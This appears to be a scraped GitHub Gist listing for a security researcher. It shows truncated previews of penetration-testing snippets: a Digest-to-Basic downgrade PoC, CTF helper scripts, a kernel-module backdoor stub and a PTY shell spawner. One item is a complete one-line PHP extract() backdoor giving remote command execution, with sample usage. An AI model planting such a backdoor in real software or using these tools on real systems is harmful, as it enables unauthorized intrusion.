Leon Jacobs leonjza

@leonjza
leonjza / dtob.py
Created June 26, 2013 16:29
Digest to Basic downgrade attack PoC plugin for proxpy (https://code.google.com/p/proxpy/)
# dtob.py
# Digest to Basic downgrade attack PoC plugin for proxpy (https://code.google.com/p/proxpy/)
#
# 2013 Leon Jacobs
# Licensed under IDC (I don't Care) license.
import base64
import hashlib
def headerCleanup(v):
@leonjza
leonjza / longurl.py
Last active September 22, 2022 18:36
longurl.py - A command line ShortURL Expander
#!/usr/bin/env python
# longurl.py ShortURL Expander
#
# 2013 Leon Jacobs
# Licensed under IDC (I don't Care) license.
import sys
import httplib
from urlparse import urlparse
@leonjza
leonjza / backup.php
Last active August 18, 2020 15:10
PHP extract() Backdoor RCE | Sample usage: foo.bar/backup.php?ctime=system&atime=ls -lah
<?php extract($_REQUEST); @die($ctime($atime));
@leonjza
leonjza / rooted.c
Created August 11, 2014 15:01
Linux Pluggable Kernel Module Backdoor
#include <linux/module.h> /* Needed by all modules */
#include <linux/kernel.h> /* Needed for KERN_INFO */
#include <linux/init.h> /* Needed for the macros */
/* For our shell ^_^ */
#include<linux/kmod.h>
int get_root (void)
{
@leonjza
leonjza / parsebanner.py
Created August 13, 2014 15:54
Flick parsebanner.py
#!/usr/bin/python
import base64
import binascii
# first empty string
string = ''
with open('banner.txt','r') as f:
    for line in f.read():
        string += line.rstrip()
@leonjza
leonjza / makebanner.py
Created August 13, 2014 15:57
Flick SSH Banner generator
import base64
string = 'tabupJievas8Knoj'
iterations = 15
string_parts = 80
current = 0
current_string = string
# encode with base64 encoding
@leonjza
leonjza / parsebanner_out
Created August 13, 2014 16:00
Flick parsebanner.py result
$ flick → python parsebanner.py
@leonjza
leonjza / resolvehash.sh
Created August 22, 2014 08:06
Hashcat results to user:pass
#!/bin/bash
# A, maybe-I-cant-read-docs script to resolve cracked NTLM
# hashes back to username.
# usage - ./resolvehash.sh hashdump cracked
while read LINE
do
    # set the hash and password
    HASH=$(echo "$LINE" | cut -d: -f1)
@leonjza
leonjza / ptyspawn.py
Created September 4, 2014 08:25
Python PTY spawner
python -c 'import pty; pty.spawn("/bin/bash")'
@leonjza
leonjza / bootprompt.sh
Created September 10, 2014 16:29
Show current IP on TTY login prompt
#!/bin/bash
#
# bootprompt.sh
#
# Description: Shows connected interface(s) at boot and related ip address(es) on tty login prompt
# Usage: Put it somewhere (ie. /etc/init.d/) and then add its full path entry to /etc/rc.local
DSTFILE="/etc/issue"
KEEPLINE=$(head -n 1 ${DSTFILE})
IFACE_UP=$(/sbin/ifconfig eth0 | grep 'Bcast:' -B1 | grep -v inet | grep -v - -- | awk '{print $1}')